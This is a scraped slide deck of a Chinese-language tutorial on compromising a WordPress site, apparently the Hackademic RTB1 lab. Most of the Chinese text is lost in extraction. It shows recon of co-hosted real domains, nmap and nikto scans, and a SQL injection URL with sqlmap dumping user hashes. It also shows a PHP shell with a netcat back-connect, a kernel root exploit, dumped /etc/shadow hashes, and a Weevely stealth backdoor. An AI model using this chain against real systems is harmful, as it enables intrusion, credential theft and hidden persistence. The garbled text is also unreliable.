29
次次 Mohamed Ramadan & fsd010 次次次次 www.hackfsd.com 27 次次次次次次次次次次次: hack-test.com ping 次次次次次次次次次 ip 次次次次次 次次次 173.236.138.113 –次次次次次次次次次次 ip 次次. 次次次次次 次次 sameip.org: 次次次次次次次 ()

一次详细的渗透Wordpress教程

Embed Size (px)

Citation preview

  • 1. Mohamed Ramadan & fsd010 www.hackfsd.com27: hack-test.com ping ip 173.236.138.113 ip . sameip.org:

2. ip 26 173.236.138.113 ID Domain Site Link1 hijackthisforum.com hijackthisforum.com2 sportforum.netsportforum.net3 freeonlinesudoku.netfreeonlinesudoku.net4 cosplayhell.com cosplayhell.com5 videogamenews.org videogamenews.org6 gametour.comgametour.com7 qualitypetsitting.net qualitypetsitting.net8 brendanichols.com brendanichols.com9 8ez.com 8ez.com1 hack-test.com hack-test.com01 kisax.com kisax.com11 paisans.com paisans.com21 mghz.commghz.com31 debateful.com debateful.com41 jazzygoodtimes.comjazzygoodtimes.com 3. 5 1 fruny.comfruny.com 6 1 vbum.com vbum.com 7 1 wuckie.com wuckie.com 8 1 force5inc.comforce5inc.com 9 2 virushero.comvirushero.com 0 2 twincitiesbusinesspeernetwork.co twincitiesbusinesspeernetwork.com 1 m 2 jennieko.com jennieko.com 2 2 davereedy.comdavereedy.com 3 2 joygarrido.com joygarrido.com 4 2 prismapp.com prismapp.com 5 2 utiligolf.comutiligolf.com 6 26 [173.236.138.113]. hacker . 1. DNS (A, NS, TXT, MX SOA)2. (Apache, IIS, Tomcat)3. ()4. email 5. (php, asp, asp.net, jsp, cfm)6. (Unix,Linux,Windows,Solaris)7. (80, 443, 21, .) dns Who.is Ok dns ~ 4. HACK-TEST.COM DNS Record Type TTL PriorityContenthack-test.comA4 hours173.236.138.113 ()hack-test.comSOA4 hoursns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400hack-test.comNS 4 hoursns1.dreamhost.comhack-test.comNS 4 hoursns3.dreamhost.comhack-test.comNS 4 hoursns2.dreamhost.comwww.hack-test.com A 4 hours173.236.138.113 ():~Apache. HACK-TEST.COM IP: 173.236.138.113: : Apache/: 1 Month: 3,213,968 3 Month: 2,161,753: 1 : 2.0 3 : 3.7: 5. nb blacktrack5 R1 whatweb: php wordpress FedoraLinux apache 2.2.15 nmap 1 root@bt:/# nmap -sV hack-test.comStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EETNmap scan report for hack-test.com (192.168.1.2)Host is up (0.0013s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION22/tcp closed ssh80/tcp open http Apache httpd 2.2.15 ((Fedora)) MAC Address:00:0C:29:01:8A:4D (VMware)Service detection performed. Please report any incorrect resultsathttp://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds2 6. root@bt:/# nmap -O hack-test.comStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET Nmapscan report for hack-test.com (192.168.1.2) Host is up (0.00079s latency).Not shown: 998 filtered portsPORT STATE SERVICE22/tcp closed ssh80/tcp open httpMAC Address: 00:0C:29:01:8A:4D (VMware)Device type: general purposeRunning: Linux 2.6.XOS details: Linux 2.6.22 (Fedora Core 6)Network Distance: 1 hopOS detection performed. Please report any incorrect resultsathttp://nmap.org/submit/Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds Linux 2.6.22(Fedora Core 6) 80 sql sql LFI RFI XSS CSRF, Nikto.pl :root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com- Nikto v2.1.4------------------------------------------------------------------+Target IP: 192.168.1.2+ Target Hostname: hack-test.com+ Target Port: 80+ Start Time: 2011-12-29 06:50:03--------------------------------------------------------------------++ Server: Apache/2.2.15 (Fedora)+ ETag header found on server, inode: 12748, size: 1475, mtime:0x4996d177f5c3b+ Apache/2.2.15 appears to be outdated (current is at leastApache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are alsocurrent.+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE+ OSVDB-877: HTTP TRACE method is active, suggesting the host isvulnerable to XST+ OSVDB-3268: /icons/: Directory indexing found.+ OSVDB-3233: /icons/README: Apache default file found. 7. + 6448 items checked: 1 error(s) and 6 item(s) reported on remotehost+ End Time: 2011-12-29 06:50:37 (34 seconds)--------------------------------------------------------------------++ 1 host(s) tested backtrack 5 R1 W3AF . root@bt:/pentest/web/w3af#./w3af_guiStarting w3af, running on:2.6.5 (r265:79063, Apr 16 2010, 13:57:41)[GCC 4.4.3]GTK version: 2.20.1PyGTK version: 2.17.0w3af - Web Application Attack and Audit FrameworkVersion: 1.2Revision: 4605Author: Andres Riancho and the w3af team. audit : 8. 9. sql xss ! sql :http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220. 10. sqlmap sqlmap u n 5 dbs 11. 3 D tables wordpress wp_users-T wp_users 22 12. -C ~ok http://www.onlinehashcrack.com/free-hash-reverse.php22054 13. q1w2e3q1w2e3 GeorgeMillerWordpress wp-admin ~ok php shell shell linux Textile. 14. php shell shell 15. ~~~ root shell back-connect 192.168.1.6 5555 ncnetcat 5555 16. : linux iduid=48(apache) gid=489(apache) groups=489(apache)pwd/var/www/html/Hackademic_RTB1/wp-content/pluginsuname aLinux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45EST 2009 i686 i686 i386 GNU/LinuxId pwd uname a kernel kernel 2.6.31.5-127.fc12.1686 exploit-db.com kernel 2.6.31 Date D A V DescriptionPlat. Author2009-10-1 - Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial 904 linuSimon5 of Servicex Vallet 17. 2009-08-3 - Linux Kernel < 2.6.31-rc7 AF_IRDA 29-Byte 137 linu Jon1 Stack Disclosure Exploit0 xOberheide2009-08-2 - Linux Kernel = 2.6.30 RDS socket exploit[*] by Dan Rosenberg[*] Resolving kernel addresses...[+] Resolved rds_proto_ops to 0xe09f0b20[+] Resolved rds_ioctl to 0xe09db06a[+] Resolved commit_creds to 0xc044e5f1[+] Resolved prepare_kernel_cred to 0xc044e452[*] Overwriting function pointer...[*] Triggering payload...[*] Restoring function pointer... id root uid=0(root) gid=0(root) /etc/shadow cat /etc/shadow root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::bin:*:14495:0:99999:7:::daemon:*:14495:0:99999:7:::adm:*:14495:0:99999:7:::lp:*:14495:0:99999:7::: 20. sync:*:14495:0:99999:7:::shutdown:*:14495:0:99999:7:::halt:*:14495:0:99999:7:::mail:*:14495:0:99999:7:::uucp:*:14495:0:99999:7:::operator:*:14495:0:99999:7:::games:*:14495:0:99999:7:::gopher:*:14495:0:99999:7:::ftp:*:14495:0:99999:7:::nobody:*:14495:0:99999:7:::vcsa:!!:14557::::::avahi-autoipd:!!:14557::::::ntp:!!:14557::::::dbus:!!:14557::::::rtkit:!!:14557::::::nscd:!!:14557::::::tcpdump:!!:14557::::::avahi:!!:14557::::::haldaemon:!!:14557::::::openvpn:!!:14557::::::apache:!!:14557::::::saslauth:!!:14557::::::mailnull:!!:14557::::::smmsp:!!:14557::::::smolt:!!:14557::::::sshd:!!:14557::::::pulse:!!:14557::::::gdm:!!:14557:::::: p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::mysql:!!:14981:::::: /etc/passwd cat /etc/passwdroot:x:0:0:root:/root:/bin/bashroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/sync 21. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinvcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologinavahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/noLoginntp:x:38:38::/etc/ntp:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinrtkit:x:498:494:RealtimeKit:/proc:/sbin/nologinnscd:x:28:493:NSCD Daemon:/:/sbin/nologintcpdump:x:72:72::/:/sbin/nologinavahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologinhaldaemon:x:68:491:HAL daemon:/:/sbin/nologinopenvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologinapache:x:48:489:Apache:/var/www:/sbin/nologinsaslauth:x:495:488:"Saslauthduser":/var/empty/saslauth:/sbin/nologinmailnull:x:47:487::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:486::/var/spool/mqueue:/sbin/nologinsmolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologinsshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinpulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologingdm:x:42:481::/var/lib/gdm:/sbin/nologinp0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bashmysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bashjohn the ripper . weevely ~1 weevely :root@bt:/pentest/backdoors/web/weevely# ./main.pyWeevely 0.3 - Generate and manage stealth PHP backdoors. 22. Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/Usage: main.py [options]Options:-h, --help show this help message and exit-g, --generate Generate backdoor crypted code, requires -o and -p .-o OUTPUT, --output=OUTPUTOutput filename for generated backdoor .-c COMMAND, --command=COMMANDExecute a single command and exit, requires -u and -p-t, --terminal Start a terminal-like session, requires -u and -p .-C CLUSTER, --cluster=CLUSTERStart in cluster mode reading items from the give file, in the formlabel,url,password where label is optional.-p PASSWORD, --password=PASSWORDPassword of the encrypted backdoor .-u URL, --url=URL Remote backdoor URL .2 weevely hax.php koko:root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p kokoWeevely 0.3 - Generate and manage stealth PHP backdoors.Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/+ Backdoor file hax.php created with password koko. 23. root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p kokoWeevely 0.3 - Generate and manage stealth PHP backdoors.Copyright (c) 2011-2012 Weevely DevelopersWebsite: http://code.google.com/p/weevely/+ Using method system().+ Retrieving terminal basic environment variables .[apache@HackademicRTB1 /var/www/html/Hackademic_RTB1/wp-content/plugins] hax.php :